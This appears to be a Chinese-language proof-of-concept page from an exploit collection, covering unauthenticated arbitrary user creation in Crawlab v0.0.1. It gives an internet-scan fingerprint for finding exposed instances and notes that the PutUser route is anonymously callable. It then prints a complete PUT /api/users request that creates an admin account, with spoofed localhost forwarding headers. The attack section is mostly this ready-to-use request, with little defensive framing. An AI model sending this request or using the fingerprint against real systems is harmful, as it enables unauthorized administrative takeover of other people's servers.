mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
61 lines
1.4 KiB
Markdown
61 lines
1.4 KiB
Markdown
# Crawlab users 任意用户添加漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
Crawlab users 的 api 存在任意用户添加,且添加为未授权接口,可通过添加后在后台进一步攻击
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Crawlab v0.0.1
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
title="Crawlab"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面
|
||
|
||

|
||
|
||
首先查看路由位置 main.go 文件
|
||
|
||

|
||
|
||
```
|
||
anonymousGrou 中为匿名可调用方法
|
||
authGroup 中为认证可调用方法
|
||
```
|
||
|
||
可以看到 Putuser方法为添加用户,但存在匿名调用
|
||
|
||

|
||
|
||
根据字段生成添加用户的请求
|
||
|
||
```
|
||
PUT /api/users HTTP/1.1
|
||
Host:
|
||
Content-Length: 83
|
||
Accept: application/json, text/plain, */*
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
|
||
Content-Type: application/json;charset=UTF-8
|
||
Accept-Encoding: gzip, deflate
|
||
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
|
||
Cookie: Hm_lvt_c35e3a563a06caee2524902c81975add=1639222117,1639278935; Hm_lpvt_c35e3a563a06caee2524902c81975add=1639278935
|
||
x-forwarded-for: 127.0.0.1
|
||
x-originating-ip: 127.0.0.1
|
||
x-remote-ip: 127.0.0.1
|
||
x-remote-addr: 127.0.0.1
|
||
Connection: close
|
||
|
||
{"username":"testppp","password":"testppp","role":"admin","email":"testppp@qq.com"}
|
||
```
|
||
|
||

|
||
|
||
 |